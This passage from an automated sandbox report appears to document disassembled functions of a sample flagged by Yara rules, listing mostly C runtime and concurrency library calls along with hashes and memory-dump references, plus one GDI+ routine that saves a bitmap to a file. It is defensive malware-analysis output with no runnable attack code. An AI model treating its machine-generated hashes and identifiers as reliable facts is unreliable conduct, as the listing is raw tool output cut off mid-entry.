                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_jicQJ2cdlM.jbxd
                                                                                    Similarity
                                                                                    • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_GetfacetRegisterThrowstd::locale::_
                                                                                    • String ID:
                                                                                    • API String ID: 2243866535-0
                                                                                    • Opcode ID: 512af338323df7cd9b5461e6ba28ebb24eb4a9fd8b3f2c51b537379dd0adb521
                                                                                    • Instruction ID: 8e1419515e35d36fc68c9e18a3e27bb0650dc63e33415fac19ced33b622727b6
                                                                                    • Opcode Fuzzy Hash: 512af338323df7cd9b5461e6ba28ebb24eb4a9fd8b3f2c51b537379dd0adb521
                                                                                    • Instruction Fuzzy Hash: B911AC729006289BCF14EBA0C841AEEB360EF44319F14043FE811BB2D2DB389A058BDC
                                                                                    Function 00404C39 Relevance: 9.1, APIs: 6, Instructions: 51COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • std::_Lockit::_Lockit.LIBCPMT ref: 00404C4A
                                                                                    • int.LIBCPMT ref: 00404C61
                                                                                      • Part of subcall function 0040BD81: std::_Lockit::_Lockit.LIBCPMT ref: 0040BD92
                                                                                      • Part of subcall function 0040BD81: std::_Lockit::~_Lockit.LIBCPMT ref: 0040BDAC
                                                                                    • std::locale::_Getfacet.LIBCPMT ref: 00404C6A
                                                                                    • std::_Facet_Register.LIBCPMT ref: 00404C9B
                                                                                    • std::_Lockit::~_Lockit.LIBCPMT ref: 00404CB1
                                                                                    • __CxxThrowException@8.LIBVCRUNTIME ref: 00404CCF
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.4174326271.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_jicQJ2cdlM.jbxd
                                                                                    Similarity
                                                                                    • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_GetfacetRegisterThrowstd::locale::_
                                                                                    • String ID:
                                                                                    • API String ID: 2243866535-0
                                                                                    • Opcode ID: 80a228f69bd2cb3116441d1b51d3088f88c36febe04a249c7f41ad217ba583fd
                                                                                    • Instruction ID: 7f60e392e4a430ae1f2c93b626e46d5b6b74a1b844d6ec56694562dd50cc071c
                                                                                    • Opcode Fuzzy Hash: 80a228f69bd2cb3116441d1b51d3088f88c36febe04a249c7f41ad217ba583fd
                                                                                    • Instruction Fuzzy Hash: 6811A072D001289BCB14EBA0C841AEEB7B0AF84319F11003EE511BB2E2DB3C990487D8
                                                                                    Function 009EC415 Relevance: 9.1, APIs: 6, Instructions: 51COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • std::_Lockit::_Lockit.LIBCPMT ref: 009EC426
                                                                                    • int.LIBCPMT ref: 009EC43D
                                                                                      • Part of subcall function 009EBFE8: std::_Lockit::_Lockit.LIBCPMT ref: 009EBFF9
                                                                                      • Part of subcall function 009EBFE8: std::_Lockit::~_Lockit.LIBCPMT ref: 009EC013
                                                                                    • std::locale::_Getfacet.LIBCPMT ref: 009EC446
                                                                                    • std::_Facet_Register.LIBCPMT ref: 009EC477
                                                                                    • std::_Lockit::~_Lockit.LIBCPMT ref: 009EC48D
                                                                                    • __CxxThrowException@8.LIBVCRUNTIME ref: 009EC4AB
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.4174782860.00000000009E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009E0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_9e0000_jicQJ2cdlM.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_GetfacetRegisterThrowstd::locale::_
                                                                                    • String ID:
                                                                                    • API String ID: 2243866535-0
                                                                                    • Opcode ID: 4e144f3e275808a570db40f1fcdaa1681d1240728c494bcfa96d4ea4c14bb240
                                                                                    • Instruction ID: 158be597f2f2fe80c30eca89bfafc3f8f9c53f6149cc78030d80877539e3bc9a
                                                                                    • Opcode Fuzzy Hash: 4e144f3e275808a570db40f1fcdaa1681d1240728c494bcfa96d4ea4c14bb240
                                                                                    • Instruction Fuzzy Hash: 8711CEB28002A8ABCB02FBA1C811BFD7764AF84311F144519F5517B2E2DF749E46CB90
                                                                                    Function 009E4EA0 Relevance: 9.1, APIs: 6, Instructions: 51COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • std::_Lockit::_Lockit.LIBCPMT ref: 009E4EB1
                                                                                    • int.LIBCPMT ref: 009E4EC8
                                                                                      • Part of subcall function 009EBFE8: std::_Lockit::_Lockit.LIBCPMT ref: 009EBFF9
                                                                                      • Part of subcall function 009EBFE8: std::_Lockit::~_Lockit.LIBCPMT ref: 009EC013
                                                                                    • std::locale::_Getfacet.LIBCPMT ref: 009E4ED1
                                                                                    • std::_Facet_Register.LIBCPMT ref: 009E4F02
                                                                                    • std::_Lockit::~_Lockit.LIBCPMT ref: 009E4F18
                                                                                    • __CxxThrowException@8.LIBVCRUNTIME ref: 009E4F36
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.4174782860.00000000009E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009E0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_9e0000_jicQJ2cdlM.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_GetfacetRegisterThrowstd::locale::_
                                                                                    • String ID:
                                                                                    • API String ID: 2243866535-0
                                                                                    • Opcode ID: 80a228f69bd2cb3116441d1b51d3088f88c36febe04a249c7f41ad217ba583fd
                                                                                    • Instruction ID: e2fb0b261ec61d2336ac44e2986b912e1c380db4c5a8b8b7f5de1b182c6f1375
                                                                                    • Opcode Fuzzy Hash: 80a228f69bd2cb3116441d1b51d3088f88c36febe04a249c7f41ad217ba583fd
                                                                                    • Instruction Fuzzy Hash: 7D11A1728002A89BCF16EBA5C845BED7774BF84711F140519F514672D2DF749E44CB94
                                                                                    Function 00A08957 Relevance: 8.9, APIs: 2, Strings: 3, Instructions: 117COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • ___except_validate_context_record.LIBVCRUNTIME ref: 00A0898A
                                                                                    • __IsNonwritableInCurrentImage.LIBCMT ref: 00A08A43
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.4174782860.00000000009E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009E0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_9e0000_jicQJ2cdlM.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: CurrentImageNonwritable___except_validate_context_record
                                                                                    • String ID: 11@$@fB$csm
                                                                                    • API String ID: 3480331319-1464837749
                                                                                    • Opcode ID: be357bd56004c24e133951e3250c1e3ffc6610d741da1472be978505f667fff6
                                                                                    • Instruction ID: 00d4dc4de233b62f49939e16a1274f5a1e79632fa66ecbd208dfdac215c61fdf
                                                                                    • Opcode Fuzzy Hash: be357bd56004c24e133951e3250c1e3ffc6610d741da1472be978505f667fff6
                                                                                    • Instruction Fuzzy Hash: 4641E630E0030DABCF10DF68D881AAEBBB5AF44364F148156E8556B3D2DB3ADE11CB95
                                                                                    Function 0042370F Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 70COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • SetEvent.KERNEL32(?,00000000), ref: 00423759
                                                                                    • Concurrency::details::ContextBase::TraceContextEvent.LIBCMT ref: 00423741
                                                                                      • Part of subcall function 0041B74C: Concurrency::details::ContextBase::ThrowContextEvent.LIBCONCRT ref: 0041B76D
                                                                                    • __CxxThrowException@8.LIBVCRUNTIME ref: 0042378A
                                                                                    • Concurrency::details::ContextBase::TraceContextEvent.LIBCMT ref: 004237B3
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.4174326271.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_jicQJ2cdlM.jbxd
                                                                                    Similarity
                                                                                    • API ID: Context$Event$Base::Concurrency::details::$ThrowTrace$Exception@8
                                                                                    • String ID: 11@
                                                                                    • API String ID: 2630251706-1785270423
                                                                                    • Opcode ID: 458ed3e5417ba220ed4bd1e4a28432a397d2c2fe66a31dff9dce91352e516156
                                                                                    • Instruction ID: 33ce48ef146ac78a3ef221314cc781bfd8a3c25b4f9a6e194e2960aa52b33145
                                                                                    • Opcode Fuzzy Hash: 458ed3e5417ba220ed4bd1e4a28432a397d2c2fe66a31dff9dce91352e516156
                                                                                    • Instruction Fuzzy Hash: 9C110B757002106BCF047F65DC85DAE7765EF84772B10416BFA05D7292CFAC9E41CA98
                                                                                    Function 0041CE2D Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 35threadCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • Concurrency::details::SchedulerProxy::GetCurrentThreadExecutionResource.LIBCMT ref: 0041CE41
                                                                                    • Concurrency::details::ResourceManager::RemoveExecutionResource.LIBCONCRT ref: 0041CE65
                                                                                    • std::invalid_argument::invalid_argument.LIBCONCRT ref: 0041CE78
                                                                                    • __CxxThrowException@8.LIBVCRUNTIME ref: 0041CE86
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.4174326271.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_jicQJ2cdlM.jbxd
                                                                                    Similarity
                                                                                    • API ID: Resource$Concurrency::details::Execution$CurrentException@8Manager::Proxy::RemoveSchedulerThreadThrowstd::invalid_argument::invalid_argument
                                                                                    • String ID: pScheduler
                                                                                    • API String ID: 3657713681-923244539
                                                                                    • Opcode ID: 9390b3195b713983fe10ad4c3c6d405898b6246382bfd66b9966ffe9dd40d037
                                                                                    • Instruction ID: 46b9ecfe0875f7f86596c353a9bffc422044863c42dab0ab2bac390bf5a45ba1
                                                                                    • Opcode Fuzzy Hash: 9390b3195b713983fe10ad4c3c6d405898b6246382bfd66b9966ffe9dd40d037
                                                                                    • Instruction Fuzzy Hash: 8FF0593594070863C324EB15DC828DEB3799E91728360812FE40563182CF3CAE8AC69D
                                                                                    Function 0041E63D Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 28threadCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • Concurrency::details::FreeThreadProxy::ReturnIdleProxy.LIBCONCRT ref: 0041E65F
                                                                                    • std::invalid_argument::invalid_argument.LIBCONCRT ref: 0041E672
                                                                                    • __CxxThrowException@8.LIBVCRUNTIME ref: 0041E680
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.4174326271.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_jicQJ2cdlM.jbxd
                                                                                    Similarity
                                                                                    • API ID: Concurrency::details::Exception@8FreeIdleProxyProxy::ReturnThreadThrowstd::invalid_argument::invalid_argument
                                                                                    • String ID: 11@$pContext
                                                                                    • API String ID: 1990795212-1086721755
                                                                                    • Opcode ID: a1f300e0f29ed94639b3e21e46aa6b462f5911b6182861392c7cf2f18a492d1f
                                                                                    • Instruction ID: 1f218d0b40ab772f1aed9042d58143e35ca4ab3a9892fa22be9c34d269449320
                                                                                    • Opcode Fuzzy Hash: a1f300e0f29ed94639b3e21e46aa6b462f5911b6182861392c7cf2f18a492d1f
                                                                                    • Instruction Fuzzy Hash: 45E06139B0011457CB04FB66DC06C5DB7A8AEC0B14750006FF901A3342DFB8A90585C8
                                                                                    Function 00411EB8 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 20COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • Concurrency::critical_section::unlock.LIBCMT ref: 00411EBC
                                                                                      • Part of subcall function 00411132: Concurrency::details::LockQueueNode::WaitForNextNode.LIBCMT ref: 00411153
                                                                                      • Part of subcall function 00411132: Concurrency::details::LockQueueNode::WaitForNextNode.LIBCMT ref: 0041118A
                                                                                      • Part of subcall function 00411132: Concurrency::details::LockQueueNode::DerefTimerNode.LIBCONCRT ref: 00411196
                                                                                    • Concurrency::details::_ReaderWriterLock::_Scoped_lock::~_Scoped_lock.LIBCONCRT ref: 00411EC8
                                                                                      • Part of subcall function 00410AA3: Concurrency::critical_section::unlock.LIBCMT ref: 00410AC7
                                                                                    • Concurrency::Context::Block.LIBCONCRT ref: 00411ECD
                                                                                      • Part of subcall function 00412C81: Concurrency::details::SchedulerBase::CurrentContext.LIBCMT ref: 00412C83
                                                                                    • Concurrency::critical_section::lock.LIBCONCRT ref: 00411EED
                                                                                      • Part of subcall function 0041105B: Concurrency::details::LockQueueNode::LockQueueNode.LIBCONCRT ref: 00411069
                                                                                      • Part of subcall function 0041105B: Concurrency::critical_section::_Acquire_lock.LIBCONCRT ref: 00411076
                                                                                      • Part of subcall function 0041105B: Concurrency::critical_section::_Switch_to_active.LIBCMT ref: 00411081
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.4174326271.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_jicQJ2cdlM.jbxd
                                                                                    Similarity
                                                                                    • API ID: Concurrency::details::LockQueue$NodeNode::$Concurrency::critical_section::_Concurrency::critical_section::unlockNextWait$Acquire_lockBase::BlockConcurrency::Concurrency::critical_section::lockConcurrency::details::_ContextContext::CurrentDerefLock::_ReaderSchedulerScoped_lockScoped_lock::~_Switch_to_activeTimerWriter
                                                                                    • String ID: 11@
                                                                                    • API String ID: 3659872527-1785270423
                                                                                    • Opcode ID: 82de0933dc6785f3946ddc0ad7c0081e97ef1b3c93ec0f171fb3e506e287e00c
                                                                                    • Instruction ID: 5f19519383477fd90e693e8c592c5b4d2a982a5ecb934fba7b69a42e3a353b75
                                                                                    • Opcode Fuzzy Hash: 82de0933dc6785f3946ddc0ad7c0081e97ef1b3c93ec0f171fb3e506e287e00c
                                                                                    • Instruction Fuzzy Hash: E8E0D8355005029BCB04FF21C5614DCFB617F44354B10825EE466432E1CF785D86CB88
                                                                                    Function 009F211F Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 20COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • Concurrency::critical_section::unlock.LIBCMT ref: 009F2123
                                                                                      • Part of subcall function 009F1399: Concurrency::details::LockQueueNode::WaitForNextNode.LIBCMT ref: 009F13BA
                                                                                      • Part of subcall function 009F1399: Concurrency::details::LockQueueNode::WaitForNextNode.LIBCMT ref: 009F13F1
                                                                                      • Part of subcall function 009F1399: Concurrency::details::LockQueueNode::DerefTimerNode.LIBCONCRT ref: 009F13FD
                                                                                    • Concurrency::details::_ReaderWriterLock::_Scoped_lock::~_Scoped_lock.LIBCONCRT ref: 009F212F
                                                                                      • Part of subcall function 009F0D0A: Concurrency::critical_section::unlock.LIBCMT ref: 009F0D2E
                                                                                    • Concurrency::Context::Block.LIBCONCRT ref: 009F2134
                                                                                      • Part of subcall function 009F2EE8: Concurrency::details::SchedulerBase::CurrentContext.LIBCMT ref: 009F2EEA
                                                                                    • Concurrency::critical_section::lock.LIBCONCRT ref: 009F2154
                                                                                      • Part of subcall function 009F12C2: Concurrency::details::LockQueueNode::LockQueueNode.LIBCONCRT ref: 009F12D0
                                                                                      • Part of subcall function 009F12C2: Concurrency::critical_section::_Acquire_lock.LIBCONCRT ref: 009F12DD
                                                                                      • Part of subcall function 009F12C2: Concurrency::critical_section::_Switch_to_active.LIBCMT ref: 009F12E8
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.4174782860.00000000009E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009E0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_9e0000_jicQJ2cdlM.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: Concurrency::details::LockQueue$NodeNode::$Concurrency::critical_section::_Concurrency::critical_section::unlockNextWait$Acquire_lockBase::BlockConcurrency::Concurrency::critical_section::lockConcurrency::details::_ContextContext::CurrentDerefLock::_ReaderSchedulerScoped_lockScoped_lock::~_Switch_to_activeTimerWriter
                                                                                    • String ID: 11@
                                                                                    • API String ID: 3659872527-1785270423
                                                                                    • Opcode ID: 82de0933dc6785f3946ddc0ad7c0081e97ef1b3c93ec0f171fb3e506e287e00c
                                                                                    • Instruction ID: 062f20dbf43070862eb7f4e95739510506eaa6ed697b6e87d48212500baea15a
                                                                                    • Opcode Fuzzy Hash: 82de0933dc6785f3946ddc0ad7c0081e97ef1b3c93ec0f171fb3e506e287e00c
                                                                                    • Instruction Fuzzy Hash: 57E04F3560051E9BCB08FB64C8617BCFB61BFC5310B544249A565472E2CF746E46DBC5
                                                                                    Function 0042B126 Relevance: 7.7, APIs: 5, Instructions: 222COMMONLIBRARYCODE
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.4174326271.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_jicQJ2cdlM.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 7096e54c8b2da2135de54d2c532f2528a1a3733c17ca5e9eea5bc4f64eff24f9
                                                                                    • Instruction ID: 7eacffcc392e6897453e427a1bc5d3d4951d53cce7b4b374ddd0667b65be5727
                                                                                    • Opcode Fuzzy Hash: 7096e54c8b2da2135de54d2c532f2528a1a3733c17ca5e9eea5bc4f64eff24f9
                                                                                    • Instruction Fuzzy Hash: FF718E31B00266DBCB21CF95E884ABFBB75EF45360FA8426BE81057280D7789D41C7E9
                                                                                    Function 00A0B38D Relevance: 7.7, APIs: 5, Instructions: 222COMMONLIBRARYCODE
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.4174782860.00000000009E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009E0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_9e0000_jicQJ2cdlM.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: c6c6193084eda7c089116deee67986cf6f8c182de1deee36b40da2a445f3b6d2
                                                                                    • Instruction ID: 3fcc0115710fcafdd79e88be8057a95b3eb59d611b01eab74e40388ce73881f9
                                                                                    • Opcode Fuzzy Hash: c6c6193084eda7c089116deee67986cf6f8c182de1deee36b40da2a445f3b6d2
                                                                                    • Instruction Fuzzy Hash: D471C23192021EDBCB218F95EE84ABFBB75EF55310F2442A9E412972D1DB70AD41CBB1
                                                                                    Function 00430A64 Relevance: 7.7, APIs: 5, Instructions: 187COMMONLIBRARYCODE
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                      • Part of subcall function 004336C7: RtlAllocateHeap.NTDLL(00000000,0040D895,00000000,?,004267BE,00000002,00000000,00000000,00000000,?,0040CD46,0040D895,00000004,00000000,00000000,00000000), ref: 004336F9
                                                                                    • _free.LIBCMT ref: 00430B6F
                                                                                    • _free.LIBCMT ref: 00430B86
                                                                                    • _free.LIBCMT ref: 00430BA5
                                                                                    • _free.LIBCMT ref: 00430BC0
                                                                                    • _free.LIBCMT ref: 00430BD7
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.4174326271.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_jicQJ2cdlM.jbxd
                                                                                    Similarity
                                                                                    • API ID: _free$AllocateHeap
                                                                                    • String ID:
                                                                                    • API String ID: 3033488037-0
                                                                                    • Opcode ID: c373ba6c443c71e4ab428eca93eb82442dc6f2775a0feb0437eab9ebf47d5f4f
                                                                                    • Instruction ID: b3708cb7fd5f7c05c7b70e76ebc142bc523ed94c66de99b1f2255d1376b2cc69
                                                                                    • Opcode Fuzzy Hash: c373ba6c443c71e4ab428eca93eb82442dc6f2775a0feb0437eab9ebf47d5f4f
                                                                                    • Instruction Fuzzy Hash: BD51DF31A00304ABDB21DF6AC851A6BB7F4EF58724F14566EE809DB250E739A901CB48
                                                                                    Function 00A10CCB Relevance: 7.7, APIs: 5, Instructions: 187COMMONLIBRARYCODE
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.4174782860.00000000009E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009E0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_9e0000_jicQJ2cdlM.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: _free$AllocateHeap
                                                                                    • String ID:
                                                                                    • API String ID: 3033488037-0
                                                                                    • Opcode ID: e6a1cd199720be507b115cfcd6438e99282708a3fba9711a6543aa0e9cd6d86a
                                                                                    • Instruction ID: 2f5d718656467f31ba35d4f49ef85b867146be96070b5ab60165ce99805ba8a8
                                                                                    • Opcode Fuzzy Hash: e6a1cd199720be507b115cfcd6438e99282708a3fba9711a6543aa0e9cd6d86a
                                                                                    • Instruction Fuzzy Hash: DE51C671A00704AFDB20DF69D941BAAB7F4EF59710B144569E909DB290E771ED81CB40
                                                                                    Function 004314FB Relevance: 7.6, APIs: 5, Instructions: 129COMMONLIBRARYCODE
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.4174326271.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_jicQJ2cdlM.jbxd
                                                                                    Similarity
                                                                                    • API ID: _free
                                                                                    • String ID:
                                                                                    • API String ID: 269201875-0
                                                                                    • Opcode ID: 709da5f20d6e6a4df2ef3b0591b918cf649e9a4efbf4d631092fdebfca928cec
                                                                                    • Instruction ID: 2269d71fc1307fb615fcd26a16e66de3d258f5a42cea17c2f792775dd2d74ff0
                                                                                    • Opcode Fuzzy Hash: 709da5f20d6e6a4df2ef3b0591b918cf649e9a4efbf4d631092fdebfca928cec
                                                                                    • Instruction Fuzzy Hash: E541C432E00204AFCB10DF78C981A5AB7B5EF89714F15456EE516EB391DB35ED02CB84
                                                                                    Function 00A11762 Relevance: 7.6, APIs: 5, Instructions: 129COMMONLIBRARYCODE
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.4174782860.00000000009E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009E0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_9e0000_jicQJ2cdlM.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: _free
                                                                                    • String ID:
                                                                                    • API String ID: 269201875-0
                                                                                    • Opcode ID: 709da5f20d6e6a4df2ef3b0591b918cf649e9a4efbf4d631092fdebfca928cec
                                                                                    • Instruction ID: aef147785f1886856430ba9e22658de10bd386e6b6aea666fd86e2b5b2845d2b
                                                                                    • Opcode Fuzzy Hash: 709da5f20d6e6a4df2ef3b0591b918cf649e9a4efbf4d631092fdebfca928cec
                                                                                    • Instruction Fuzzy Hash: 1A41AF36A003049FCB24DF78C981AAEB7F5EF89714F2585A9E615EB381D731AD41CB80
                                                                                    Function 004368BD Relevance: 7.6, APIs: 5, Instructions: 110COMMONLIBRARYCODE
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • MultiByteToWideChar.KERNEL32(?,00000000,23E85006,0042D11A,00000000,00000000,0042D958,?,0042D958,?,00000001,0042D11A,23E85006,00000001,0042D958,0042D958), ref: 0043690A
                                                                                    • __alloca_probe_16.LIBCMT ref: 00436942
                                                                                    • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 00436993
                                                                                    • GetStringTypeW.KERNEL32(?,00000000,00000000,?), ref: 004369A5
                                                                                    • __freea.LIBCMT ref: 004369AE
                                                                                      • Part of subcall function 004336C7: RtlAllocateHeap.NTDLL(00000000,0040D895,00000000,?,004267BE,00000002,00000000,00000000,00000000,?,0040CD46,0040D895,00000004,00000000,00000000,00000000), ref: 004336F9
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.4174326271.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_jicQJ2cdlM.jbxd
                                                                                    Similarity
                                                                                    • API ID: ByteCharMultiWide$AllocateHeapStringType__alloca_probe_16__freea
                                                                                    • String ID:
                                                                                    • API String ID: 313313983-0
                                                                                    • Opcode ID: 3e8a2e8aab748589cebb1bfb4cc7bc8f0b8dcb51511829ebe5bc338c40e17782
                                                                                    • Instruction ID: 564015b8663966f91a736df8c1f199cffa5732d11cc50b43fea489f3b547491b
                                                                                    • Opcode Fuzzy Hash: 3e8a2e8aab748589cebb1bfb4cc7bc8f0b8dcb51511829ebe5bc338c40e17782
                                                                                    • Instruction Fuzzy Hash: 0A31CE72A0020AAFDF249F65CC41EAF7BA5EF44714F16422AFC04D6290EB39CD54CB98
                                                                                    Function 0041AEE6 Relevance: 7.6, APIs: 5, Instructions: 88COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • _SpinWait.LIBCONCRT ref: 0041AF0B
                                                                                      • Part of subcall function 00410F41: _SpinWait.LIBCONCRT ref: 00410F59
                                                                                    • Concurrency::details::ContextBase::ClearAliasTable.LIBCONCRT ref: 0041AF1F
                                                                                    • Concurrency::details::_ReaderWriterLock::_AcquireWrite.LIBCONCRT ref: 0041AF51
                                                                                    • List.LIBCMT ref: 0041AFD4
                                                                                    • List.LIBCMT ref: 0041AFE3
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.4174326271.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_jicQJ2cdlM.jbxd
                                                                                    Similarity
                                                                                    • API ID: ListSpinWait$AcquireAliasBase::ClearConcurrency::details::Concurrency::details::_ContextLock::_ReaderTableWriteWriter
                                                                                    • String ID:
                                                                                    • API String ID: 3281396844-0
                                                                                    • Opcode ID: 1637b491240e50c5e643825cbab1343b8211ccee4cd56710176c1192e2ab3ef7
                                                                                    • Instruction ID: 96d9cd947b213099fbcac924e0358b3b7b3cf073485a4601a3d8c747dc036099
                                                                                    • Opcode Fuzzy Hash: 1637b491240e50c5e643825cbab1343b8211ccee4cd56710176c1192e2ab3ef7
                                                                                    • Instruction Fuzzy Hash: 8C318971D02656DFCB14EFA5C5816EEBBB1BF04308F04006FE80167292DB786DA5CB9A
                                                                                    Function 00402054 Relevance: 7.6, APIs: 5, Instructions: 80memoryfilewindowCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • GdiplusStartup.GDIPLUS(?,?,00000000), ref: 00402086
                                                                                    • GdipAlloc.GDIPLUS(00000010), ref: 0040208E
                                                                                    • GdipCreateBitmapFromHBITMAP.GDIPLUS(?,00000000,?), ref: 004020A9
                                                                                    • GdipSaveImageToFile.GDIPLUS(?,?,?,00000000), ref: 004020D3
                                                                                    • GdiplusShutdown.GDIPLUS(?), ref: 004020FF
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.4174326271.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_jicQJ2cdlM.jbxd
                                                                                    Similarity
                                                                                    • API ID: Gdip$Gdiplus$AllocBitmapCreateFileFromImageSaveShutdownStartup
                                                                                    • String ID:
                                                                                    • API String ID: 2357751836-0
                                                                                    • Opcode ID: 217f5abb5afa1b455eb2dbd7401cc4696c8519af6d5153b3f711d937d629bad7
                                                                                    • Instruction ID: c4f18e326f444715a52338ef43c677910c1406114480214147ef42e81c070973
                                                                                    • Opcode Fuzzy Hash: 217f5abb5afa1b455eb2dbd7401cc4696c8519af6d5153b3f711d937d629bad7
                                                                                    • Instruction Fuzzy Hash: 4D2151B5A0031AAFDB10DFA5DD499AFFBB9FF48741B104036E906E3290D7759901CBA8
                                                                                    Function 009E50EB Relevance: 7.6, APIs: 5, Instructions: 67COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • std::_Locinfo::_Locinfo.LIBCPMT ref: 009E50C8
                                                                                    • std::_Locinfo::~_Locinfo.LIBCPMT ref: 009E50DC
                                                                                      • Part of subcall function 009EBDD3: __EH_prolog3_GS.LIBCMT ref: 009EBDDA
